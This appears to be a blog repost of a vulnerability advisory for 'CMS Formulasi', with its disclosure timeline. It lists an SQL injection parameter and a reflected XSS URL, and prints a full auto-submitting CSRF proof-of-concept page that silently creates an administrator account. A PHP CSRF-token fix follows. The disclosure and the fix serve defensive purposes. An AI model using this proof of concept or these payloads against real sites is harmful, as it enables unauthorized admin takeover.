Friday, 29 September 2017

Exploit CMS Formulasi 2017 | CSRF Vulnerability

Good afternoon, internet residents, and thank you for visiting this simple blog; I hope it is useful. This time we will look at exploiting CMS Formulasi using the CSRF shown below. Good luck :D


========================
SQL Injection
========================

Found on

http://localhost/formulasi/kelas-siswa.html 

parameter : kelas

post data : kelas=1{SQL_HERE}

========================
XSS Vulnerability
========================

Found On

parameter : tgl

http://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script>


========================
CSRF Vulnerability
========================

---------------------BOF--------------------------------------------------

<html>
<head>
<title>Formulasi CSRF Exploit</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "489","36","27" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 3;
    var i=0;

    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        pausecomp(pauses[i]);
    }
}
</script>

<H2>Formulasi CSRF Exploit</H2>

<form method="POST" name="form1" action="http://localhost:80/cmsformulasi/adminpanel/aplikasi/admin/admin.php?pilih=admin&untukdi=tambah">
<input type="hidden" name="nama_admin" value="usernya"/>
<input type="hidden" name="username" value="Sarahma12"/>
<input type="hidden" name="email" value="research@sarahma.co.id"/>
<input type="hidden" name="level_users" value="1"/>
<input type="hidden" name="password" value="Password12"/>
<input type="hidden" name="password_lagi" value="Password12"/>
</form>

</body>
</html>

---------------------EOF--------------------------------------------------

========================
Solution :
========================

No Update Until This Advisory published
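
With no vendor fix available, the add-admin request shown in the CSRF section can be protected with a per-session token; the following is an added example, not CMS Formulasi code and not part of the original advisory. The function names, the `csrf_token` field and the session key are assumptions; only the `pilih=admin&untukdi=tambah` action comes from the PoC above.

```php
<?php
declare(strict_types=1);

// Added example, not CMS Formulasi code. Names below are assumptions.
// SameSite keeps the session cookie off cross-site form POSTs (PHP 7.3+).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// One random token per session, embedded in every admin form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to print inside the legitimate "add admin" form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison of the submitted token with the session's token.
function csrf_is_valid(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

// Guard placed before the add-admin logic (pilih=admin&untukdi=tambah).
// A forged cross-site form cannot read the session's token, so it fails here.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && ($_GET['pilih'] ?? '') === 'admin'
    && ($_GET['untukdi'] ?? '') === 'tambah'
    && !csrf_is_valid($_POST, $_SESSION)) {
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}
// The CMS's existing add-admin code would run from here on.
```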

========================
Timeline:
========================

2013-09-27 Provided details vulnerability to vendor

2013-10-01 Second Notification to Vendor

2013-10-04 No Response From Vendor

Source: https://www.exploit-db.com/

Thank you for visiting this blog; I hope it is useful.
